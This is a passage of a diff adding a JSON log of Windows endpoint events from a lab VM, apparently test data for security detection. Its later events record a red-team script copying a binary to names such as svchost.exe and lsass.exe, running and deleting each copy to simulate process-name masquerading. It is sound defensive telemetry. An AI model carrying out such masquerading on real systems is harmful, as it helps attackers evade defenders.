"C:\\Windows\\System32\\services.exe", + "pid": 1108, + "ppid": 524, + "process_name": "spoolsv.exe", + "process_path": "C:\\Windows\\System32\\spoolsv.exe", + "serial_event_id": 20, + "subtype": "create", + "timestamp": 131485996530000000, + "unique_pid": 20, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 1136, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 21, + "subtype": "create", + "timestamp": 131485996530000000, + "unique_pid": 21, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "LOCAL SERVICE" + }, + { + "command_line": "\"C:\\Program Files\\VMware\\VMware Tools\\VMware VGAuth\\VGAuthService.exe\"", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "ccd745aa6425c7637a34ff12ed8a1c18", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 1320, + "ppid": 524, + "process_name": "VGAuthService.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\VMware VGAuth\\VGAuthService.exe", + "serial_event_id": 22, + "subtype": "create", + "timestamp": 131485996530000000, + "unique_pid": 22, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\"", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "404202d6f0628331aaade8c8f9ef6feb", + "opcode": 3, + 
"parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 1344, + "ppid": 524, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "serial_event_id": 23, + "subtype": "create", + "timestamp": 131485996530000000, + "unique_pid": 23, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "\"C:\\Program Files\\VMware\\VMware Tools\\VMware CAF\\pme\\bin\\ManagementAgentHost.exe\"", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "3f61b1a4fe078bb7705b508cfcbb987e", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 1376, + "ppid": 524, + "process_name": "ManagementAgentHost.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\VMware CAF\\pme\\bin\\ManagementAgentHost.exe", + "serial_event_id": 24, + "subtype": "create", + "timestamp": 131485996530000000, + "unique_pid": 24, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\svchost.exe -k NetworkServiceNetworkRestricted", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 1692, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 25, + "subtype": "create", + "timestamp": 131485996540000000, + "unique_pid": 25, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "NETWORK SERVICE" + }, + { + "command_line": "C:\\Windows\\system32\\wbem\\wmiprvse.exe", + "event_subtype_full": "already_running", + "event_type": 
"process", + "event_type_full": "process_event", + "md5": "8f4ecbbfe943030acfd9e892b2513ec1", + "opcode": 3, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 1840, + "ppid": 648, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "serial_event_id": 26, + "subtype": "create", + "timestamp": 131485996540000000, + "unique_pid": 26, + "unique_ppid": 11, + "user_domain": "NT AUTHORITY", + "user_name": "NETWORK SERVICE" + }, + { + "command_line": "C:\\Windows\\System32\\msdtc.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "de0ece52236cfa3ed2dbfc03f28253a8", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 960, + "ppid": 524, + "process_name": "msdtc.exe", + "process_path": "C:\\Windows\\System32\\msdtc.exe", + "serial_event_id": 27, + "subtype": "create", + "timestamp": 131485996550000000, + "unique_pid": 27, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "NETWORK SERVICE" + }, + { + "command_line": "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "60c2862b4bf0fd9f582ef344c2b1ec72", + "opcode": 3, + "pid": 3048, + "ppid": 3040, + "process_name": "csrss.exe", + "process_path": "C:\\Windows\\System32\\csrss.exe", + "serial_event_id": 28, + "subtype": "create", + "timestamp": 131485996790000000, + "unique_pid": 28, + "unique_ppid": 0, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "winlogon.exe", 
+ "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "1151b1baa6f350b1db6598e0fea7c457", + "opcode": 3, + "pid": 2108, + "ppid": 3040, + "process_name": "winlogon.exe", + "process_path": "C:\\Windows\\System32\\winlogon.exe", + "serial_event_id": 29, + "subtype": "create", + "timestamp": 131485996790000000, + "unique_pid": 29, + "unique_ppid": 0, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "rdpclip", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "25d284eb2f12254c001afe9a82575a81", + "opcode": 3, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 2704, + "ppid": 968, + "process_name": "rdpclip.exe", + "process_path": "C:\\Windows\\System32\\rdpclip.exe", + "serial_event_id": 30, + "subtype": "create", + "timestamp": 131485996810000000, + "unique_pid": 30, + "unique_ppid": 19, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "\"taskhost.exe\"", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "517110bd83835338c037269e603db55d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 2776, + "ppid": 524, + "process_name": "taskhost.exe", + "process_path": "C:\\Windows\\System32\\taskhost.exe", + "serial_event_id": 31, + "subtype": "create", + "timestamp": 131485996810000000, + "unique_pid": 31, + "unique_ppid": 8, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "C:\\Windows\\system32\\sppsvc.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "e17e0188bb90fae42d83e98707efa59c", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": 
"C:\\Windows\\System32\\services.exe", + "pid": 2804, + "ppid": 524, + "process_name": "sppsvc.exe", + "process_path": "C:\\Windows\\System32\\sppsvc.exe", + "serial_event_id": 32, + "subtype": "create", + "timestamp": 131485996810000000, + "unique_pid": 32, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "NETWORK SERVICE" + }, + { + "command_line": "\"C:\\Windows\\system32\\Dwm.exe\"", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "f162d5f5e845b9dc352dd1bad8cef1bc", + "opcode": 3, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 2464, + "ppid": 896, + "process_name": "dwm.exe", + "process_path": "C:\\Windows\\System32\\dwm.exe", + "serial_event_id": 33, + "subtype": "create", + "timestamp": 131485997150000000, + "unique_pid": 33, + "unique_ppid": 16, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "C:\\Windows\\Explorer.EXE", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "ac4c51eb24aa95b77f705ab159189e24", + "opcode": 3, + "pid": 2460, + "ppid": 3052, + "process_name": "explorer.exe", + "process_path": "C:\\Windows\\explorer.exe", + "serial_event_id": 34, + "subtype": "create", + "timestamp": 131485997150000000, + "unique_pid": 34, + "unique_ppid": 0, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" -n vmusr", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "404202d6f0628331aaade8c8f9ef6feb", + "opcode": 3, + "parent_process_name": "explorer.exe", + "parent_process_path": "C:\\Windows\\explorer.exe", + "pid": 2604, + "ppid": 2460, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + 
"serial_event_id": 35, + "subtype": "create", + "timestamp": 131485997150000000, + "unique_pid": 35, + "unique_ppid": 34, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "C:\\Windows\\system32\\SearchIndexer.exe /Embedding", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "ad31942bdf3d594c404874613bc2fe4d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 1620, + "ppid": 524, + "process_name": "SearchIndexer.exe", + "process_path": "C:\\Windows\\System32\\SearchIndexer.exe", + "serial_event_id": 36, + "subtype": "create", + "timestamp": 131485997210000000, + "unique_pid": 36, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\svchost.exe -k LocalServiceAndNoImpersonation", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 3684, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 37, + "subtype": "create", + "timestamp": 131485997750000000, + "unique_pid": 37, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "LOCAL SERVICE" + }, + { + "command_line": "C:\\Windows\\System32\\svchost.exe -k secsvcs", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 3712, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + 
"serial_event_id": 38, + "subtype": "create", + "timestamp": 131485997750000000, + "unique_pid": 38, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "\"C:\\Windows\\system32\\cmd.exe\" ", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "5746bd7e255dd6a8afa06f7c42c1ba41", + "opcode": 3, + "parent_process_name": "explorer.exe", + "parent_process_path": "C:\\Windows\\explorer.exe", + "pid": 2864, + "ppid": 2460, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "serial_event_id": 39, + "subtype": "create", + "timestamp": 131491838190000000, + "unique_pid": 39, + "unique_ppid": 34, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "\\??\\C:\\Windows\\system32\\conhost.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "bd51024fb014064bc9fe8c715c18392f", + "opcode": 3, + "parent_process_name": "csrss.exe", + "parent_process_path": "C:\\Windows\\System32\\csrss.exe", + "pid": 2228, + "ppid": 3048, + "process_name": "conhost.exe", + "process_path": "C:\\Windows\\System32\\conhost.exe", + "serial_event_id": 40, + "subtype": "create", + "timestamp": 131491838190000000, + "unique_pid": 40, + "unique_ppid": 28, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "C:\\Windows\\system32\\svchost.exe -k SDRSVC", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 3820, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 41, + "subtype": "create", + "timestamp": 131491940310000000, + "unique_pid": 
41, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\servicing\\TrustedInstaller.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "773212b2aaa24c1e31f10246b15b276c", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 3384, + "ppid": 524, + "process_name": "TrustedInstaller.exe", + "process_path": "C:\\Windows\\servicing\\TrustedInstaller.exe", + "serial_event_id": 42, + "subtype": "create", + "timestamp": 131509366130000000, + "unique_pid": 42, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\wbem\\wmiprvse.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "8f4ecbbfe943030acfd9e892b2513ec1", + "opcode": 3, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 1860, + "ppid": 648, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "serial_event_id": 43, + "subtype": "create", + "timestamp": 131509366230000000, + "unique_pid": 43, + "unique_ppid": 11, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "taskeng.exe {6108575A-1CC2-4917-BB5D-5929CDC39B9C}", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "65ea57712340c09b1b0c427b4848ae05", + "opcode": 3, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 660, + "ppid": 924, + "process_name": "taskeng.exe", + "process_path": "C:\\Windows\\System32\\taskeng.exe", + "serial_event_id": 44, + "subtype": "create", + "timestamp": 131509371900000000, + "unique_pid": 44, + "unique_ppid": 17, + 
"user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "C:\\Windows\\system32\\msiexec.exe /V", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "a190da6546501cb4146bbcc0b6a3f48b", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 760, + "ppid": 524, + "process_name": "msiexec.exe", + "process_path": "C:\\Windows\\System32\\msiexec.exe", + "serial_event_id": 45, + "subtype": "create", + "timestamp": 131509372370000000, + "unique_pid": 45, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\wsmprovhost.exe -Embedding", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "3e5cfefdda537ddbed9f5c6c7e926cdd", + "opcode": 3, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 2824, + "ppid": 648, + "process_name": "wsmprovhost.exe", + "process_path": "C:\\Windows\\System32\\wsmprovhost.exe", + "serial_event_id": 46, + "subtype": "create", + "timestamp": 131509373980000000, + "unique_pid": 46, + "unique_ppid": 11, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "C:\\Windows\\system32\\wsmprovhost.exe -Embedding", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "3e5cfefdda537ddbed9f5c6c7e926cdd", + "opcode": 3, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 3408, + "ppid": 648, + "process_name": "wsmprovhost.exe", + "process_path": "C:\\Windows\\System32\\wsmprovhost.exe", + "serial_event_id": 47, + "subtype": "create", + "timestamp": 131509374020000000, + "unique_pid": 47, + "unique_ppid": 11, + "user_domain": "vagrant", + "user_name": "vagrant" 
+ }, + { + "command_line": "\"C:\\Python27\\python.exe\" worker.py --target c:\\workspace\\red_ttp\\process_name_masquerade.py", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "21f73cd55626f0ec9fbce53eafbef128", + "opcode": 3, + "parent_process_name": "wsmprovhost.exe", + "parent_process_path": "C:\\Windows\\System32\\wsmprovhost.exe", + "pid": 420, + "ppid": 3408, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 48, + "subtype": "create", + "timestamp": 131509374020000000, + "unique_pid": 48, + "unique_ppid": 47, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "\\??\\C:\\Windows\\system32\\conhost.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "bd51024fb014064bc9fe8c715c18392f", + "opcode": 3, + "parent_process_name": "csrss.exe", + "parent_process_path": "C:\\Windows\\System32\\csrss.exe", + "pid": 3080, + "ppid": 372, + "process_name": "conhost.exe", + "process_path": "C:\\Windows\\System32\\conhost.exe", + "serial_event_id": 49, + "subtype": "create", + "timestamp": 131509374020000000, + "unique_pid": 49, + "unique_ppid": 4, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "C:\\Python27\\python.exe myappserver.py --log-file C:\\workspace\\dev\\myapp.out --update-server-port 8446 --sout C:\\workspace\\Libraries\\myapp\\myapp\\python\\myapp\\hunt_out.json", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "21f73cd55626f0ec9fbce53eafbef128", + "opcode": 3, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 1688, + "ppid": 420, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 50, + "subtype": "create", + "timestamp": 131509374100000000, + 
"unique_pid": 50, + "unique_ppid": 48, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "C:\\Python27\\python.exe C:\\workspace\\dev\\Simple_Https_Server\\simple_https_server.py", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "21f73cd55626f0ec9fbce53eafbef128", + "opcode": 3, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 1720, + "ppid": 420, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 51, + "subtype": "create", + "timestamp": 131509374100000000, + "unique_pid": 51, + "unique_ppid": 48, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "C:\\Windows\\System32\\LauncherProcess.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "6a8649f3205b311e208ac35a04e99700", + "opcode": 3, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 2164, + "ppid": 648, + "process_name": "LauncherProcess.exe", + "process_path": "C:\\Windows\\System32\\LauncherProcess.exe", + "serial_event_id": 52, + "subtype": "create", + "timestamp": 131509374150000000, + "unique_pid": 52, + "unique_ppid": 11, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\cmd.exe /c \"c:\\workspace\\red_ttp\\process_name_masquerade.py\"", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "5746bd7e255dd6a8afa06f7c42c1ba41", + "opcode": 1, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 1788, + "ppid": 420, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "serial_event_id": 53, + "subtype": "create", + "timestamp": 131509374294209140, + 
"unique_pid": 53, + "unique_ppid": 48, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "\"C:\\Python27\\python.exe\" \"C:\\workspace\\red_ttp\\process_name_masquerade.py\" ", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "21f73cd55626f0ec9fbce53eafbef128", + "opcode": 1, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2256, + "ppid": 1788, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 54, + "subtype": "create", + "timestamp": 131509374294365140, + "unique_pid": 54, + "unique_ppid": 53, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "svchost.exe", + "file_path": "C:\\workspace\\red_ttp\\svchost.exe", + "opcode": 0, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 55, + "subtype": "create", + "timestamp": 131509374295457140, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "svchost.exe", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 1, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 2760, + "ppid": 2256, + "process_name": "svchost.exe", + "process_path": "C:\\workspace\\red_ttp\\svchost.exe", + "serial_event_id": 56, + "subtype": "create", + "timestamp": 131509374295613140, + "unique_pid": 56, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "bytes_written_count": 20, + "bytes_written_string_list": [ + "en-US", + "en" + ], + "event_subtype_full": "registry_modify_event", + "event_type": "registry", + 
"event_type_full": "registry_event", + "key_path": "\\REGISTRY\\USER\\S-1-5-21-3942132181-2402070379-3970972291-1001_CLASSES\\Local Settings\\MuiCache\\1B\\52C64B7E\\LanguageList", + "key_type": "multiSz", + "opcode": 1, + "pid": 2460, + "process_name": "explorer.exe", + "process_path": "C:\\Windows\\explorer.exe", + "registry_key": "\\REGISTRY\\USER\\S-1-5-21-3942132181-2402070379-3970972291-1001_CLASSES\\Local Settings\\MuiCache\\1B\\52C64B7E", + "registry_path": "\\REGISTRY\\USER\\S-1-5-21-3942132181-2402070379-3970972291-1001_CLASSES\\Local Settings\\MuiCache\\1B\\52C64B7E\\LanguageList", + "registry_type": "multi_string", + "registry_value": "LanguageList", + "serial_event_id": 57, + "timestamp": 131509374306065200, + "unique_pid": 34, + "user_name": "vagrant" + }, + { + "event_subtype_full": "termination_event", + "event_type": "process", + "event_type_full": "process_event", + "exit_code": 0, + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 2, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 2760, + "ppid": 2256, + "process_name": "svchost.exe", + "process_path": "C:\\workspace\\red_ttp\\svchost.exe", + "serial_event_id": 58, + "subtype": "terminate", + "timestamp": 131509374345689460, + "unique_pid": 56, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_delete_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "svchost.exe", + "file_path": "C:\\workspace\\red_ttp\\svchost.exe", + "opcode": 2, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 59, + "subtype": "modify", + "timestamp": 131509374345689460, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "SVCHOST.EXE-CB1B3AA2.pf", + "file_path": 
"C:\\Windows\\Prefetch\\SVCHOST.EXE-CB1B3AA2.pf", + "opcode": 0, + "pid": 896, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 60, + "subtype": "create", + "timestamp": 131509374345689460, + "unique_pid": 16, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "lsass.exe", + "file_path": "C:\\workspace\\red_ttp\\lsass.exe", + "opcode": 0, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 61, + "subtype": "create", + "timestamp": 131509374345689460, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "lsass.exe", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 1, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 3696, + "ppid": 2256, + "process_name": "lsass.exe", + "process_path": "C:\\workspace\\red_ttp\\lsass.exe", + "serial_event_id": 62, + "subtype": "create", + "timestamp": 131509374345689460, + "unique_pid": 62, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "request_event", + "event_type": "generic", + "event_type_full": "dns_event", + "opcode": 3008, + "pid": 924, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "query_name": "teredo.ipv6.microsoft.com.", + "serial_event_id": 63, + "timestamp": 131509374350369490, + "unique_pid": 17, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_subtype_full": "termination_event", + "event_type": "process", + "event_type_full": "process_event", + "exit_code": 0, + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 2, + 
"parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 3696, + "ppid": 2256, + "process_name": "lsass.exe", + "process_path": "C:\\workspace\\red_ttp\\lsass.exe", + "serial_event_id": 64, + "subtype": "terminate", + "timestamp": 131509374395921780, + "unique_pid": 62, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_delete_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "lsass.exe", + "file_path": "C:\\workspace\\red_ttp\\lsass.exe", + "opcode": 2, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 65, + "subtype": "modify", + "timestamp": 131509374395921780, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "LSASS.EXE-02265BD5.pf", + "file_path": "C:\\Windows\\Prefetch\\LSASS.EXE-02265BD5.pf", + "opcode": 0, + "pid": 896, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 66, + "subtype": "create", + "timestamp": 131509374395921780, + "unique_pid": 16, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "services.exe", + "file_path": "C:\\workspace\\red_ttp\\services.exe", + "opcode": 0, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 67, + "subtype": "create", + "timestamp": 131509374395921780, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "services.exe", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "f49c54c4997a0401db0f6640a6111c52", + 
"opcode": 1, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 1832, + "ppid": 2256, + "process_name": "services.exe", + "process_path": "C:\\workspace\\red_ttp\\services.exe", + "serial_event_id": 68, + "subtype": "create", + "timestamp": 131509374395921780, + "unique_pid": 68, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "termination_event", + "event_type": "process", + "event_type_full": "process_event", + "exit_code": 0, + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 2, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 1832, + "ppid": 2256, + "process_name": "services.exe", + "process_path": "C:\\workspace\\red_ttp\\services.exe", + "serial_event_id": 69, + "subtype": "terminate", + "timestamp": 131509374446778110, + "unique_pid": 68, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_delete_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "services.exe", + "file_path": "C:\\workspace\\red_ttp\\services.exe", + "opcode": 2, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 70, + "subtype": 